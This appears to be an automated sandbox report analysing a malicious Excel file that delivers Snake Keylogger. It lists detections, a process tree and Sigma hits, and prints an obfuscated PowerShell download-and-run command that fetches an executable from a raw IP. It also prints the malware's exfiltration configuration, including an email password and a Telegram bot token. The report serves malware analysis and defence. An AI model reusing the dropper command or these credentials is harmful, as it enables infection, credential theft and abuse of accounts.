Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SYSN ORDER.xls

Overview

General Information

Sample name:SYSN ORDER.xls
Analysis ID:1522511
MD5:673bd0aa988ca4a1ef05edb3d5b68d60
SHA1:4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
SHA256:9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
Tags:xlsuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3344 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3624 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3712 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3736 cmdline: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3844 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3852 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 3944 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 7F0098DCC054A27F80296ADF300573EC)
            • RegSvcs.exe (PID: 3108 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
    • mshta.exe (PID: 3996 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2672 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2108 cmdline: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1692 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 1976 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 1960 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 7F0098DCC054A27F80296ADF300573EC)
            • RegSvcs.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 9 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: File With Uncommon Extension Created By An Office Application
            Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Roaming\dllhost.exe
            Sigma detected: Suspicious MSHTA Child Process
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICA
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3344, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3624, ProcessName: mshta.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dllhost.exe, NewProcessName: C:\Users\user\AppData\Roaming\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\dllhost.exe, ParentCommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , ProcessId: 3944, ProcessName: dllhost.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))", 